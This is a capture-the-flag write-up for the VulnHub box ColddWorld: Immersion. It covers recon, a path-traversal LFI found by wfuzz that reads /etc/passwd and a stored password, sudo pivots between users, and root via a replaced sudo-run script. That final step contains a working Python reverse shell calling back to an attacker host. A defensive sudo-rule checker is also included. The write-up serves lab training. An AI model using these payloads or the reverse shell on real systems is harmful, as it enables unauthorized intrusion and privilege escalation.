ColddWorld: Immersion (VulnHub) - Write-up

ColddWorld: Immersion is a vulnerable box from VulnHub that I would rate as easy.

Nmap result:

$ sudo nmap -sC -sV 192.168.0.18   
                                                                                            
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:23 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00029s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Immersion
MAC Address: 08:00:27:22:E5:01 (Oracle VirtualBox virtual NIC)

Checking port 80 website:

Gobuster scan:
$ gobuster dir -u http://192.168.0.18 -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt

/js (Status: 301)
/css (Status: 301)
/login (Status: 301)
/secure (Status: 301)
/wp (Status: 301)
/server-status (Status: 403)

Visiting /login page:

Page source for /login:
The page source reveals that there is a file named carls.txt inside the /var directory.

The /wp page goes nowhere.
We can log in to /login with random credentials. Checking the URL after logging in, we can see that account.php takes parameters for the user and the password.

Let's see if account.php accepts other parameters as well, by fuzzing parameter names with a path traversal payload as the value:
wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt --hw 0 -u '192.168.0.18/login/account.php?FUZZ=../../../../../../../../etc/passwd'

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                               
=====================================================================

000000064:   200        31 L     43 W       1608 Ch     "page"

So there is another parameter we can use: page.
Visiting "http://192.168.0.18/login/account.php?page=../../../../../../../etc/passwd" returns the contents of /etc/passwd, so we have a local file inclusion (LFI).
We can retrieve carls' credentials through the same LFI:
http://192.168.0.18/login/account.php?page=../../../../../../../var/carls.txt
Credentials:

The credentials don't work anywhere on the website, so I'll run another nmap scan over all 65535 ports:
$ nmap -p- 192.168.0.18   
 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:36 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
3042/tcp open  journee

A new port is discovered: 3042. The "journee" label is only nmap's guess from the port number, so let's run version detection against it:

$ nmap -p3042 -sC -sV 192.168.0.18

Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-02 10:37 EEST
Nmap scan report for 192.168.0.18
Host is up (0.00044s latency).

PORT     STATE SERVICE VERSION
3042/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c7:43:9b:1e:c2:a8:27:6b:c2:bc:58:a9:4d:6d:4e:14 (RSA)
|   256 60:99:c2:87:ea:6a:14:75:e1:b4:6f:93:4f:9b:fd:89 (ECDSA)
|_  256 7f:b2:4a:f2:ec:db:a5:87:45:92:2f:13:2e:5e:74:bd (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 3042 is the SSH port. Before logging in we need to decode the password, because carls.txt stores it base64 encoded:
base64: Y2FybG9z
decoded: carlos

Shell as user carls:

Checking user carls' sudo privileges:

carls is allowed to run /bin/bash as c0ldd through sudo, so the following command gives us a shell as c0ldd:
sudo -u c0ldd /bin/bash

Shell as user c0ldd:

Checking user c0ldd's sudo privileges:

c0ldd can run /usr/bin/python3 /home/c0ldd/DoNotRun.py as root via sudo.
Note: do not run that file as it is, because it is an infinite loop:

The sudo rule fixes the interpreter and the script path, but the script lives in c0ldd's own home directory, so we can replace it. Rename the DoNotRun.py file to something else and create your own DoNotRun.py with the following reverse shell (start a listener on your machine first, on the port you put in the script):
#!/usr/bin/env python3
# Reverse shell dropped in place of DoNotRun.py; sudo runs it with python3 as root.
import socket
import subprocess
import os

LHOST = "Your IP"   # attacker IP
LPORT = Port        # attacker listener port (an integer)

# Connect back to the listener and wire stdin/stdout/stderr to the socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((LHOST, LPORT))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Interactive shell inherits the redirected descriptors, i.e. it talks to us.
subprocess.call(["/bin/sh", "-i"])

Now execute the file as root through the sudo rule:
sudo -u root /usr/bin/python3 /home/c0ldd/DoNotRun.py
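Both privilege escalations on this box come from the same pattern in `sudo -l` output: a rule that hands out a bare shell as another user, or one that runs an interpreter on a script the invoking user can replace. The following is an added example written for this write-up, not part of the box, that spots both patterns in `sudo -l` text. The two sample outputs are constructed to mirror the rules used above (they are not a capture from the machine), and the writability check is injectable so the logic can be exercised without those files existing.

```python
#!/usr/bin/env python3
"""Flag sudo rules that give a shell or run an interpreter on a script the
invoking user can replace.

Hypothetical helper for this write-up, not part of the box. Feed it the
text of `sudo -l`; it reports (runas, command, script) triples.
"""
import os
import re
import sys

# Interpreters/shells where the script argument decides what really runs.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python2", "python3",
                "perl", "ruby", "php", "node"}

# Rule lines printed by `sudo -l`, e.g.
#   (root) NOPASSWD: /usr/bin/python3 /home/c0ldd/DoNotRun.py
#   (c0ldd) /bin/bash
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?:NOPASSWD:\s*)?(?P<cmd>ALL|/\S.*)$")


def parse_rules(sudo_l_output):
    """Return [(runas, argv)] for every rule line; other lines are ignored."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas").strip(), m.group("cmd").split()))
    return rules


def replaceable_by_me(path):
    """True if we can write the file, or rename/recreate it because we can
    write its directory (the trick used against DoNotRun.py above)."""
    return os.access(path, os.W_OK) or os.access(os.path.dirname(path) or ".", os.W_OK)


def risky_rules(sudo_l_output, is_replaceable=replaceable_by_me):
    findings = []
    for runas, argv in parse_rules(sudo_l_output):
        if argv == ["ALL"]:
            findings.append((runas, "ALL", None))        # any command at all
            continue
        if os.path.basename(argv[0]) not in INTERPRETERS:
            continue
        if len(argv) == 1:
            findings.append((runas, argv[0], None))      # bare shell/interpreter
        elif is_replaceable(argv[1]):
            findings.append((runas, argv[0], argv[1]))   # runas executes our script
    return findings


# Constructed samples in the shape sudo -l prints, mirroring the two rules
# exploited in this write-up (not a capture from the box).
SAMPLE_CARLS = """\
User carls may run the following commands on Immersion:
    (c0ldd) /bin/bash
"""
SAMPLE_C0LDD = """\
User c0ldd may run the following commands on Immersion:
    (root) /usr/bin/python3 /home/c0ldd/DoNotRun.py
"""

if __name__ == "__main__":
    # Usage on the target: sudo -l | python3 sudo_check.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_C0LDD
    hits = risky_rules(text)
    for runas, cmd, script in hits:
        what = f"{cmd} on replaceable script {script}" if script else cmd
        print(f"[!] as {runas}: {what}")
    if not hits:
        print("[-] no shell or replaceable-script rule found")
```

The fix on the defensive side follows from the check: a sudo rule that names an interpreter must point at a script (and a directory) that only root can write, otherwise the rule is equivalent to granting root a shell.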

Shell as root:

Now you can get the user flag from user c0ldd's directory and the root flag from the root directory!
